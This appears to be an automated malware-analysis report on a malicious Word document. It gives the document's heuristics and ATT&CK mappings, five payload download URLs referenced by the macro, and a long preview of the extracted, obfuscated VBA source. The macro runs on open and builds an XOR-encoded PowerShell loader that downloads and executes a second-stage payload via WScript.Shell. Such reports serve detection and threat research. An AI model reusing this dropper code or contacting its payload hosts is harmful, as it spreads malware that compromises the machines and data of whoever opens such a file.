MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes `WScript.Shell` and `CreateObject` to execute arbitrary code, indicated by the `OLE_VBA_SHELL` and `OLE_VBA_CREATEOBJ` heuristics. The presence of an `AutoOpen` macro further suggests an immediate execution upon opening. The primary function of the script appears to be downloading and executing a second-stage payload, as suggested by the ClamAV detection name 'Doc.Dropper.Agent-6601498-0'.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6601498-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6601498-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
rzWbU = 7075 + LwLZp + 17974 / ijkfk + 56822 * NKwBC * iGFwaq / nCRcJ - tMniX - Gdijil + 70532 * jdpaZR sizPjE = hTiMSCb + CreateObject("Wscript.shell").Run(HwAlR + Chr(vbKeyP) + XUCsGChK + Chr(vbKeyO) + iiwlAXvmIQJidj + NnHHCHwrUV, 589402899 - 589402899) NjwZUj = 56780 + siQMdU + 64448 / DPiirK + 16216 * BoCfaj * rwcWG / wmvio - SkYNLL - IjWFkD + 52564 * YfhwA -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
rzWbU = 7075 + LwLZp + 17974 / ijkfk + 56822 * NKwBC * iGFwaq / nCRcJ - tMniX - Gdijil + 70532 * jdpaZR sizPjE = hTiMSCb + CreateObject("Wscript.shell").Run(HwAlR + Chr(vbKeyP) + XUCsGChK + Chr(vbKeyO) + iiwlAXvmIQJidj + NnHHCHwrUV, 589402899 - 589402899) NjwZUj = 56780 + siQMdU + 64448 / DPiirK + 16216 * BoCfaj * rwcWG / wmvio - SkYNLL - IjWFkD + 52564 * YfhwA -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "msWOPNjPjDvwFn" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.epicmusicla.com/R8SeKMT4/ Referenced by macro
- http://www.eminenceinternationalschool.com/SyIAP7bf/Referenced by macro
- http://www.sominamgiasi.com/zggoc7n6/Referenced by macro
- http://sidinhoimoveis.com/includes/bm/Referenced by macro
- http://sahathaikasetpan.com/Jbh1k/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18951 bytes |
SHA-256: e5df536b9e8775b790df682585533fa8de4b1b2791435cd11572e1f933aa29f4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
388 of 601 identifiers look randomly generated (e.g. 'msWOPNjPjDvwFn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bFjjcQsMPpvT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "msWOPNjPjDvwFn"
Sub AutoOpen()
On Error Resume Next
ihctR = 60501 * UCDZI + oUPrG + CPzNz - ModOt * vDOToB - XJKDb / KFVjw * 11045 + ivDKjU - nEqvFI * iFvVjN + izrLX * nBrIh * 16951 + tzADkU
XwRLYB = 99815 * NTLJBv + kDNwD + rUCrjL - zqrzJ * waThU - XSLsC / hzunWq * 89320 + ijcOTp - cqWcNA * zaRVtY + ffcAwC * dLUAC * 48317 + RzFOfh
ZowqC = 32323 * SGcHuN + RlFDLf + ASAjf - UCaNLc * TuVKO - mnchH / FSMdOz * 11963 + QYVvHX - FPjPwR * SXQuo + tVXlst * XHYLNE * 66147 + vYZDrn
coPous = 99754 * WBzVD + AAOXn + wiCbLb - fcMHN * lCrMMB - OJpSD / VaRzqq * 85653 + wzlnd - hUrKt * iRAInC + dOpoj * dFkNi * 40892 + UlpFF
psqtm = 58326 * bPajGj + trhujv + ipjQR - BMlhHj * WUdkw - pSPtO / kIddz * 84098 + CpLCHc - twPdt * ZTIYNw + PFBOwU * hcYjnp * 42739 + XKSWHd
MurGGk = 43887 * QtJoD + QnuKJ + DUbFZi - NEonZS * YMjdi - OkPoi / NTwMRj * 1251 + YrTljb - JIcFjW * vEHQjw + SFmbnR * QrWEYU * 71089 + tuzCVE
hSSPz = 36848 * fAZLQr + AvMwL + rlNiO - JhiErl * rpQhb - EkHBR / QRbtDo * 9119 + LivFk - AJtAv * aEAikO + lHXkkv * zfinbQ * 75467 + AMuKw
mjuPSY = 85315 * BCBMF + jKtKPt + GALBJ - KMTid * pSDjXw - YmUCW / fuMkD * 83295 + LLjij - IKhsh * YjPTd + WMMUil * otiUwb * 31664 + WUimVz
lRzbrii (dFkasoDz + YzNGBjQXLmf + DOmQHQDi + RJMwGtJqK)
XjzsiE = 20491 * pJtmK + DMQIT + uciSR - ioRsuV * GaKAo - tiEznK / qjRkEZ * 22200 + Auzja - VWvwOY * DjsLbZ + rpfvIY * BWjoUJ * 9979 + jNUOk
uaVtaP = 35733 * suBisR + PKrlc + IRDSzB - tQlLG * cNkTcv - QUptcW / JcPqN * 43768 + lIRad - QDbIp * IpIfr + qpXoc * qarsR * 2140 + zjZqES
tDlAnw = 32766 * EQAwWw + wGmhoR + fqDFu - zGqoRo * zdvhz - cTTmt / hjNLj * 50382 + JUXvwh - VBwZL * hkqTKF + XoFMDK * NMjuG * 28409 + fraizz
whWNsj = 7238 * OVBzX + WjnzjH + DVYmaN - piwDMw * ITKwv - mMWqT / UaCmtX * 21713 + vLwbR - LPfXz * ZJONdA + BwrzhS * tRmwEj * 1838 + VwVifc
End Sub
Function dFkasoDz()
On Error Resume Next
ljimXh = (DOwzS + fAPEi - UVJmnW / 9246 + (84525 * iCYLi * 48900 - zKnkX))
nmNnm = (kGQXR + budvYj - cDpwQ / 26067 + (15561 * HaTPK * 86353 - hYKAB))
PoTMWw = (EuQKXs + ctuPT - IVLYon / 74360 + (37247 * ERtKk * 11444 - SbAIw))
inmRp = (CALNT + rYMQr - wftZI / 9324 + (95207 * CQMoI * 52295 - JVoFM))
zwpCFwTFlXq = "wershe" + "ll " + " " + " " + " -joI" + "N " + Chr(40) + Chr(40) + " 31 ," + " 84 , 87" + " , 65,6" + ", 85, " + "94 ,7" + "6 ,22, 84"
PDPwL = (LjlMa + AFPrl - mqzml / 60370 + (67358 * bnwiJ * 78006 - iNbhJv))
tmPqpW = (kIwuJ + ioPWM - DuFAr / 86777 + (56695 * iJGCr * 71678 - iBoMw))
GcTZz = (YntKT + zIGcS - PmzYnD / 5841 + (72105 * VsnKcZ * 41905 - XTMhYA))
juotcb = (LrWDQ + Uwznza - kdfzIG / 79462 + (36018 * ElXhZ * 86609 - BEolw))
TvAzLvkv = " ,89,81 ," + " 94 ,88" + " ,79 ,27," + "117 ," + " 94, 79, " + "21 ,108 ," + "94, 89 ," + "120 , 8" + "7, 82, 9" + "4 , 8"
caXAF = (hmoQq + PPkXG - cTitsw / 91246 + (54101 * FHpFNw * 28398 - kapWn))
jnwOf = (mCBktE + mkjiGK - jdkwJM / 33369 + (48464 * njMvCz * 22191 - PlRIz))
RjtMX = (tfaBH + TiiiZE - icizKd / 32437 + (2230 * zwQJoG * 25866 - wlYQn))
wHfNh = (CBiDq + Fwtnl - zLzpb / 5543 + (88323 * XKDnb * 17947 - zHnam))
suqPPJCiWIM = "5,79" + ", 0 ," + " 31," + "110 , 125" + ",72," + "6,28 ,83 " + ",79 , 79" + " ,75" + " , 1 " + ", 20 ," + "20 , "
kOHHJ = (IMKSwv + jcjbpm - rkwMw / 20307 + (38609 * QfdcNz * 57716 - ZBYtPK))
dXOTdX = (qZTFOd + YNVzp - XiMNwY / 45565 + (57500 * sIpiz * 22539 - TOZQfj))
CuvDB = (zzAEwd + RvLwa - vfoWi / 65119 + (5624 * JaRslh * 52816 - RBGSVR))
jPkWaZ = (DRFnt + CzETS - SODjJ / 64162 + (78408 * XTUtr * 67004 - EiZpqz))
PPUrGPBkU = "76 ," + "76, 76 ,2" + "1, 94" + " , 7" + "5 , 82,88" + " , 86,"
KCnRmS = (TQfDLO + iRiSu - tFRWEY / 37266 + (87020 * IPKZVF * 64001 - knaQGI))
ivYAwb = (abTRA + rtfFu - SnIRJH / 97432 + (60076 * NwATMT * 19709 - ULFwVE))
kfYQvJ = (SbiwE + RMNzzp - PtltL / 2205 + (47662 * iTMmzm * 72793 - ACzVw))
YjSzjs = (kTfbKu + AXFzA - hKPkjB / 50300 + (87689 * ZZKnq * 75141 - darlVH))
KdiICKWGNEc = "78, 7" + "2 , 82,8" + "8 ,87" + ",90 ,21" + ", 88, 84," + " 86," + "20,105," + "3 ,10"
zwiiLj = (ERHAl + NaYIbN - IDNwhZ / 19452 + (9460 * iWLcTf * 42811 - FkzsG))
Wovjjn = (EwXkis + wCRVuG - IHziUC / 48052 + (60248 * SAQDP * 99713 - pwQdw))
hmLqDw = (CzXhk + ikBmZH - jloIYh / 7744 + (16980 * rQjCb * 61868 - ViGGM))
tVwXuf = (zDldI + dPtzwk - iSzov / 63614 + (7989 * upnwj * 31577 - nKbkI))
nETPGp = "4 , 94" + ",112," + " 118 " + ",111" + ", 15 , " + "20, 123" + " ,83 , " + "79, 79," + "75 ,1,20," + "20 ,7" + "6 ,76 ,7"
nhoKX = (SQojf + ZwnNK - COinNi / 55085 + (59477 * SzrbSt * 25516 - XvCSf))
LrhCvj = (DpUZc + GqfkcP - LTsTsQ / 51062 + (98741 * WLpXIG * 11933 - LhfjNc))
YnnwFb = (blztP + jzTGis - zSzIN / 56684 + (23570 * QSHaXh * 12064 - ajXDj))
swXijM = (QlMFj + hzBOk - YuEkN / 79718 + (63638 * ocXddB * 30578 - zKmSM))
jPDfDtHaVIS = "6 ,21" + ", 94 , 8" + "6,82 , 8" + "5, 9" + "4 ,8" + "5 ,88 " + ",94 " + ",82,85 ,7" + "9,94 ,73"
dFkasoDz = zwpCFwTFlXq + TvAzLvkv + suqPPJCiWIM + PPUrGPBkU + KdiICKWGNEc + nETPGp + jPDfDtHaVIS
QBScO = (LBCZb + KcPqd - aqZAD / 27666 + (65051 * svMQf * 36115 - vtjmv))
sFjGD = (wdliA + OciHP - DSuWC / 4376 + (17253 * IwHDE * 15289 - zXkFoF))
csYsJP = (jdCGkZ + HzPzD - NOQplu / 17173 + (83360 * ijEiQ * 95167 - BHuzmU))
AvBAKv = (unFfsw + JfFIJ - JkEXz / 69203 + (8817 * ujqwq * 11625 - zOapz))
End Function
Function YzNGBjQXLmf()
On Error Resume Next
HYLYpi = (hbqTq + jLspN - RUwDr / 34953 + (1553 * uXJhDJ * 47913 - KRTqk))
ijfiq = (QGpzNB + wGJaSs - mOMHfd / 16194 + (8443 * CKObac * 51014 - fZuYNM))
Qakha = (GQniCN + IIVUG - zGKRJP / 64377 + (79565 * BbWXk * 25632 - XSKrN))
QFuWis = (VTAisj + UWCdz - vBWids / 60424 + (28520 * wCbBR * 3715 - bfUQim))
RFOSUvhzswi = " , 85 , " + "90 ,79, " + "82 , 84" + " ,85 " + ",90," + "87,72," + "88, 83" + " ,84, 84 " + ",87,21" + ",88, 84," + "86, 2" + "0 , 1"
oMCOj = (PMsZq + vovRq - zzpNOp / 47447 + (79648 * mFwcUi * 25839 - IdJPj))
OBSqv = (PTYCH + liWLi - IBwjA / 99933 + (89955 * LRFPkl * 84599 - jTKsXd))
MfbsoN = (wpfOTQ + awNpr - cHuzVc / 66418 + (35789 * ohhSQc * 64782 - wkbtqP))
JVzQzO = (rwOmPX + wMiMV - nwZKUj / 45069 + (91497 * wZYBiw * 18238 - sHWKSQ))
dHhEN = "04 ,66," + " 114, 12" + "2 , 107," + " 12, 89" + ", 93 ," + " 20 , 123" + ",83, 79" + ",79,75 ,"
rjSOD = (HBSswU + azAzmJ - NWXKWD / 70929 + (69248 * RaXFv * 13603 - qCSjCt))
hWIuGm = (iKSpi + jsQPP - SOmkpc / 40350 + (65800 * nAvKXG * 36731 - QVdjta))
JpfzCk = (jEOLp + JHsAt - rARZP / 68671 + (37695 * JzUZj * 39063 - NUrEiz))
OJQIW = (IZYwWi + UhBSv - wwOIR / 42284 + (26247 * uDBmz * 58956 - kXjrYz))
IFFLq = "1, 20, " + "20, 76," + " 76, 76 ," + "21,7" + "2 ,84" + " , 86,8" + "2 ,85 ,9" + "0, 86,9"
KqiXJ = (DscQfd + EzXlYD - CwJjwC / 27047 + (87976 * YCLkPU * 32976 - snCru))
iAisK = (kNRfT + lVtodo - vTBQi / 5416 + (94155 * fYBKVq * 6440 - NpAFa))
HIWEA = (itBjsF + jwbHj - IDOUs / 29921 + (68862 * KslBpI * 48613 - aZzNS))
BjETCV = (boAhX + lTRlEc - JWfHvQ / 94382 + (99742 * mBYozj * 10243 - BfakZ))
imcwqUGpz = "2, 82, 9" + "0 ,72" + ", 82" + " , 21, 8" + "8, 8" + "4 , 86 ," + "20 ,65" + ", 92,92" + ",84 , 88" + " ,12"
XmFBZT = (vdpKr + qHMkk - oHbmS / 49040 + (12344 * QEZDu * 74628 - iDKUXX))
qzrQA = (mDXsE + PJzYDm - BKLJw / 70662 + (29515 * WXntw * 62651 - AEuzEG))
BDKTr = (JONZLi + bvzmbT - BrDlPF / 33573 + (15683 * CQNtX * 11178 - czhVO))
zbFiHW = (ImwJw + mdkAp - WFpPV / 94598 + (82297 * wjzdjp * 99265 - ZKwva))
UIWRD = " , 8" + "5 , " + "13 ," + " 20 , 1" + "23 ,8" + "3 ,79"
zTrwwT = (VOBTT + FUvZC - rmdZr / 25980 + (76228 * hwFDMd * 28951 - MsAJc))
sNtQN = (bzRrP + rhRYi - Xvmhim / 89219 + (10430 * oXztlS * 57241 - JPitia))
nhckO = (aplLnw + nUuAk - laWIw / 14284 + (82066 * nICZs * 86173 - wwzGzq))
AiYIR = (vZDvv + Nrfqs - lpPjjw / 12344 + (91757 * JviEh * 26358 - JjlpTH))
zRfMtLzJN = ",79 " + ",75 , 1" + ",20, 20," + " 72," + "82 , 95 ," + " 82 , 8" + "5, 83 ," + "84 , 82"
iQJWIX = (IMlznP + MfJoE - PXtia / 48242 + (38792 * iTEAj * 51886 - hULFad))
apZzri = (tQVXF + qSvar - flvjzk / 39284 + (37980 * lCqDbw * 35504 - YHzzVR))
jwthj = (KwsPa + jHXavj - Xdtjw / 13674 + (78540 * fLzjdw * 29175 - uotszw))
qKJsBC = (YSdbvV + iHVIf - aUwdiN / 97079 + (15057 * vjtUw * 82243 - cCDiG))
DIQsqQPJArG = " , 86 " + ", 84" + ",77 " + ",94, " + "82, 72 ," + " 21 ,88" + " ,84,86 ,"
jpsLAm = (wsaioJ + imOSZ - XAGUG / 54776 + (33885 * kWvsjP * 59878 - aSaksZ))
lvjvwG = (NCPzN + oRNPH - uiRIqV / 15519 + (91637 * UEwnh * 58121 - vbwrmI))
THVJu = (FiJzzU + iYEXVs - WfqIu / 76543 + (86922 * vroJw * 51264 - MkSWFi))
NFrszc = (SBLQwf + cPWOj - OfTda / 45942 + (51683 * SuqKT * 26723 - rsbWA))
kAioI = " 20 ,8" + "2,85,88 " + ",87, 78 ," + "95, 9" + "4 ,72" + " ,20 , 8" + "9 , 86"
YzNGBjQXLmf = RFOSUvhzswi + dHhEN + IFFLq + imcwqUGpz + UIWRD + zRfMtLzJN + DIQsqQPJArG + kAioI
YwUaIl = (DbRpr + zEzEZ - lzKwJq / 5245 + (18015 * DObzwh * 75791 - ETMzsM))
njwYls = (GXJNOf + qBZKt - cWWwh / 37977 + (25152 * fCajrD * 9712 - bljAB))
UKlbjj = (rpJPjO + LjGcjz - psvaK / 41074 + (87200 * Nmsnhi * 97022 - aaJQW))
pYJkXw = (XDPOkJ + mqZoK - tzQMjZ / 88787 + (41794 * RPElAc * 68903 - kkwPwB))
End Function
Function DOmQHQDi()
On Error Resume Next
bMcto = (ZuRUv + vzwvWS - wNXdKn / 17837 + (43645 * cwwqVT * 15143 - viYXA))
zjONf = (hcctq + coCEh - wuSLVM / 16922 + (39697 * fRKiwp * 13805 - mqwwo))
JYJrLn = (SwPbHo + jSGfh - RUVFJb / 84010 + (60259 * ntPwT * 27474 - AvziF))
PjZSw = (PYAwWP + QKBrR - FbUjdX / 54572 + (26157 * anatFW * 13449 - WOVhOG))
zuwMriamBX = ", 20" + " , 123 ," + "83 , " + "79, " + "79 , 75,1" + ",20 ,2" + "0 ,72 ,9" + "0 ,83 ," + " 90 ,79" + ", 83,90, " + "82,80" + ",90, 72,"
VvUMiP = (Yorlaw + rohbV - kicZi / 26026 + (93837 * sOojzX * 81018 - qflFj))
AYqiD = (vwUmh + ArwEb - oiFzs / 58896 + (901 * kXkEEW * 39830 - BjmuS))
ZuBhAi = (jGoIG + mSvhRS - jZCEcY / 42563 + (39777 * BqPcsI * 66842 - zNOcL))
XKAYsq = (BwONmK + mNCEKN - LSLrQ / 41194 + (32993 * NlnIw * 89922 - VnQdP))
Voqawb = "94,79, 75" + " , 90,85" + ",21 ,88,8" + "4,86 ,2" + "0,113, 8" + "9, 83" + " , 10 ," + "80, 20" + ",28, 2" + "1 , "
vrRCjr = (wAaQt + ipEujq - BKaFI / 29687 + (95805 * aQcKD * 52059 - WwfbzW))
ubhGj = (EllHFJ + jtJKG - uQHrmu / 63292 + (82862 * WmfwYV * 79708 - ZilLO))
QrPAbA = (XVAdz + lRMuTt - YkwGp / 41297 + (4281 * GOIqC * 20436 - ipHnwn))
CCVcu = (IrbsmB + dDCjMd - UYNQi / 20868 + (82722 * pQSjtY * 60389 - cPjTV))
toWAkaNll = "104, 75" + ",87,8" + "2 , 79 , " + "19 ," + "28, " + "123,28 ," + "18 , 0" + ", 31 " + ",95, 1"
pwwijB = (iXjLsF + YbGvXR - VNLNpJ / 85551 + (85558 * OWbYK * 56826 - GMolF))
VRwfq = (XpSvrS + PnXKjX - wJWwC / 6052 + (14740 * rvkUU * 2087 - XRBdCs))
kbnrA = (avsFd + TknRus - mOVoQj / 37694 + (90918 * ziijr * 32046 - jZwIZS))
cAkss = (ojzhw + lnjuLC - VPzbJl / 93371 + (82215 * jbUnj * 93310 - rBCocu))
JiEYIDN = "27 ,74, 2" + "7, 6, 2" + "7 ,28,2 " + ", 2 ,8" + " , 28 , 0" + ",31 ,105 "
pIIRM = (ncQYqQ + LtaRZ - zfwdYh / 83368 + (59256 * JtzKq * 22113 - ODFmF))
vRtjQ = (SVRzHU + MhidX - miQMc / 69326 + (70564 * ZGUACS * 37183 - OjimwE))
nplNEr = (AJqDsz + sfkjUF - SWZjZ / 26460 + (5821 * XLnfUs * 14782 - KdzESA))
QmoYa = (vCnbC + QLuBc - lTwWLX / 97279 + (79649 * QFJDV * 32458 - tkIdcu))
kjFlcMDaU = ",93, 126" + ", 6,31 " + ", 94," + " 85,77, " + "1 , 79, 9" + "4, 86," + "75 ," + "16, 28,10"
TEEuzI = (fGBLa + jIWpw - BWwZj / 69209 + (68949 * Bnklw * 14120 - fzzEjK))
tziZJ = (VJUat + ZTaHG - uvAwR / 40192 + (225 * nYDbMo * 3191 - UvsqG))
TdWWNW = (HpFMn + cWfXK - kOsWP / 29450 + (37609 * AIYlMz * 36688 - SDKWN))
VfNYpi = (wVhzOY + FQwfut - wzEBz / 66819 + (37202 * zkYhou * 63654 - LvIwH))
BJprtAY = "3,28" + ",16 , 31" + " , 9" + "5, 127" + " , 74" + ",16 ,"
vsiIMj = (ZPjRkF + lvklZ - AwwhD / 1575 + (54486 * kMfRH * 48520 - NNEtj))
UdniGm = (SQzhc + kMczmp - AiDws / 18327 + (21641 * fNSjL * 71061 - ZPRWu))
ZPfzP = (hXPjr + AmzvzF - HbpDD / 997 + (56202 * IXhfsq * 82792 - iQjnfv))
Frnzr = (ZzcLwD + SXvfJZ - NwFsN / 10327 + (35977 * wiPPA * 52503 - IKTdHO))
quLKlCnY = "28 ," + "21,94 , " + "67,94" + " ,28" + ", 0 , 93 " + ", 84," + " 73,94, 9" + "0 ,88"
rbRqpv = (zabYTS + OwKzm - jbGkvD / 88634 + (39101 * BMjHu * 90954 - PLbOjm))
YfIPli = (iQpNR + MpCPcG - qiKDv / 23611 + (53113 * obikw * 39285 - ijvms))
ErbAdC = (djbrJ + UhulB - zZOpL / 45685 + (44141 * izWXvw * 78559 - sTDQR))
FRfLN = (rWnmAq + plZoq - bnmChB / 31671 + (19135 * mMfQu * 36503 - RXniNT))
NEpuwz = " ,83 , 1" + "9, 31," + "95, " + "115, " + "124,27" + ",82,85 " + ",27,31"
IauhG = (bbMov + tYjJm - EUjjv / 43626 + (95465 * rLCUDj * 92835 - zCanF))
uBTiSi = (YDEzXi + loUYZ - kaTZqE / 92795 + (36758 * lVJkS * 59285 - RlrzzF))
vsdZkj = (FNISj + dnYiX - HWQYsl / 30058 + (19485 * ZdiwKL * 48796 - FWmOzl))
AijJdH = (MqDaKC + uVFUZD - upHdUU / 23047 + (13860 * UqOjp * 90503 - uREzGz))
jLapcu = " , 11" + "0 ,12" + "5, 72" + ",18, 64 ," + " 79 , 7" + "3, 66 , 6"
DOmQHQDi = zuwMriamBX + Voqawb + toWAkaNll + JiEYIDN + kjFlcMDaU + BJprtAY + quLKlCnY + NEpuwz + jLapcu
kiFLJX = (cProML + AiiaL - HzYiYI / 66319 + (69812 * JIqzD * 5971 - Gdkzl))
lcLfP = (jqkKY + FFrTFR - zkiBq / 39783 + (3093 * fzFtj * 87529 - zWDcGq))
LoqiN = (CbpXOm + nGXmA - NXGjwO / 15734 + (42257 * bFpMvC * 72803 - rpuvhd))
uNnuXU = (RpYFNT + unOhHQ - innMo / 88654 + (42887 * hbjfvZ * 23219 - JYwaU))
End Function
Function RJMwGtJqK()
On Error Resume Next
QOIPEu = (iRsLpV + lfhOVi - LTDXM / 50392 + (53997 * LtmXR * 26372 - jZONZ))
OOtmP = (uIHdh + sFAGT - AwoiqK / 11725 + (27820 * zEtKlf * 93126 - RLMKt))
MSIRBB = (mSGXA + EuFrr - TjFzZ / 33132 + (7789 * iwIAI * 10750 - zBvFL))
OFCXVj = (AVpiXi + CaULOf - tiRso / 35082 + (15418 * QdKTG * 42833 - wSzUsf))
nwsLM = "4, 31,8" + "4 ,87 " + ",65 ,21 " + ",127,8" + "4, 76 ," + "85, 87" + ",84,9" + "0 , 95 , "
LLzjRM = (tcfJR + ANzfm - znzbn / 96894 + (52554 * jBzECj * 34242 - CVOZjf))
OYkciS = (jjVqz + zIEbci - ncscri / 69760 + (73904 * nwwNh * 25184 - AUitTk))
SbPoYk = (XEpdwp + kKiqN - rcbGkz / 15670 + (21543 * QNlTzf * 48 - JCOqi))
EbTad = (zWsiM + OjjYj - AcuENT / 91339 + (82290 * AiuGYG * 75504 - DXjcwv))
wuCXj = "125 , " + "82 ,87 ,9" + "4 ,19" + ",31 " + ",95 " + ",115 ," + " 124," + " 23,2" + "7 , 31 " + ", 105," + "93,126, "
Lncab = (rkiLu + htmPiN - BVoaLE / 76063 + (8020 * sDzBn * 70910 - EHhLZ))
PtbTVu = (rqLYci + kMljUB - VITScr / 95849 + (25288 * rQclck * 72936 - UCuqQ))
WPaiZ = (jMcJW + RqXNQW - zisiNt / 80796 + (93564 * hHBCPp * 98082 - zjiWU))
PdzqAP = (bmLlH + jIkvhY - wWrkH / 74178 + (51204 * GwlZD * 97111 - wssjWT))
TVhqTWOwh = "18 , 0 , " + "104 ,7" + "9 ,90,73," + "79 , 22 " + ",107 ,7" + "3,84 , 8" + "8 ,9" + "4,72 , " + "72 , 27"
OJTizi = (bzDMJ + XnSTo - kfkLd / 80870 + (35511 * VajjE * 35725 - sqZTA))
biMrOF = (tjbTk + mAjTDw - uGCfwF / 48539 + (25670 * owLMYZ * 77748 - QcsQD))
mnSDbu = (SrzCUM + Rizps - LDASXI / 83236 + (97375 * zsAoQw * 84708 - IBvVz))
inLVon = (uCTRul + AsDqi - THzsB / 99513 + (51095 * PSHoE * 36426 - fRWJZo))
zkYfafXmTPd = ", 31,105" + ", 93 ,1" + "26, 0, 8" + "9,73, " + "94,90,8" + "0, 0 "
FEpAo = (MiVTM + zOuOH - sEHfR / 32506 + (77501 * XwViSM * 7538 - paSXWI))
WflLn = (ntKbb + hqGtvk - PAYEr / 74876 + (77087 * cAftrz * 68485 - VOATJ))
qhHtHr = (jwImbs + amYMv - OIqBzM / 12860 + (48450 * wkhjF * 32462 - JXhCpP))
YVfOF = (cisWL + UbjvJj - EviHY / 20573 + (25341 * VCaFX * 81911 - dKQqTw))
VOJYXSSLq = ", 70, " + "88,90" + ", 79, " + "88, 83," + "64,70," + " 70 " + Chr(41) + "|fO" + "reACh-O" + "bjECt " + "{[Cha" + "r] " + Chr(40) + " $" + "_ -bXor "
bLzKWu = (bTWVJ + YYilmS - rzjQbz / 55548 + (19187 * uTlVl * 12254 - lnzqK))
zWbmi = (jitBDc + wwYad - vHJmU / 90356 + (57286 * iaahza * 27405 - wzQFr))
zdOoE = (KjShG + Ccijj - RLVZC / 69298 + (76194 * SAzwm * 55049 - XBDBmv))
CZGIUj = (DdlRj + ZwatYz - Ksfijl / 95788 + (42094 * fuRzjw * 96819 - jSETZX))
iQitdLUKA = " 0x3" + "B " + Chr(41) + "} " + Chr(41) + "|. " + Chr(40) + Chr(40) + "va" + "RiaBLE '*" + "Mdr*'" + Chr(41) + "."
wFwzJ = (aRVNq + DfVkp - oHtBaC / 35673 + (98133 * idnuhG * 53028 - wGUJu))
jvcvVT = (pwJfD + RbTsOi - rvszi / 19250 + (81670 * whoSuG * 74846 - qjvCR))
sRlklV = (AiMNld + ufufKl - ohTJSc / 31251 + (42872 * VStjBk * 78179 - jdwdu))
oHvuJ = (pZddX + AwpkHr - LEDST / 12504 + (3962 * nzbKY * 19394 - TBqZl))
zEDELDss = "NaME[3,1" + "1,2]-" + "JOIn''" + Chr(41) + ""
RJMwGtJqK = nwsLM + wuCXj + TVhqTWOwh + zkYfafXmTPd + VOJYXSSLq + iQitdLUKA + zEDELDss
UFWBK = (OkZip + PooXr - jYPWzY / 19476 + (91428 * lBJuEV * 28165 - DGdDSz))
hDwXvz = (moqVA + RlsrLF - OpkwK / 56520 + (23246 * GLBhSi * 13334 - hdBoIb))
CGWZsH = (lcNBXq + FwrPcc - PokjAw / 72705 + (32714 * XRajT * 88266 - kDauQ))
TkAwAW = (Nliwoj + DfRLdi - RUMJdf / 27169 + (56415 * TcoLb * 14747 - fJTolv))
End Function
Attribute VB_Name = "MJAYmOnzYY"
Function lRzbrii(iiwlAXvmIQJidj)
On Error Resume Next
RASmIo = 1240 + jMJuro + 28036 / bCfnk + 15737 * zTjsn * thLKul / qBzlmi - XDBHw - LJDSrP + 18577 * TTcvMl
lLLPC = 46154 + FUAOI + 89408 / ZzDfr + 26446 * CffiWV * FEzIL / YtuQL - LiDLvr - Ypquth + 27941 * ijflf
fwjzCj = 41863 + DtAFnj + 93133 / Ztwkj + 57378 * SfcnXh * pZsis / RJwKp - zYrJVK - BDBPB + 4699 * FRRas
sAQCF = 94454 + qjCmUu + 3414 / zTjms + 94009 * PKEaz * pNPij / TinJpu - iJoHZ - MAjNvw + 75522 * XkGwf
iEsMw = 98755 + hcPIWi + 70128 / afYXw + 30016 * abNqun * MqCsr / HuSZi - wGQVP - LYDKB + 3605 * vhdRw
sjDbNF = 82723 + zPzmuA + 58057 / bVGdA + 61481 * oJrfq * AsVSrr / VQwQT - BnDdGC - lqwUP + 96663 * MPRVZ
FBXPY = 12534 + qVAfMz + 86538 / TqJGwn + 65821 * GCoAX * hidTRZ / ZqsOl - qYYzC - pbqTL + 99796 * WmQMk
rzWbU = 7075 + LwLZp + 17974 / ijkfk + 56822 * NKwBC * iGFwaq / nCRcJ - tMniX - Gdijil + 70532 * jdpaZR
sizPjE = hTiMSCb + CreateObject("Wscript.shell").Run(HwAlR + Chr(vbKeyP) + XUCsGChK + Chr(vbKeyO) + iiwlAXvmIQJidj + NnHHCHwrUV, 589402899 - 589402899)
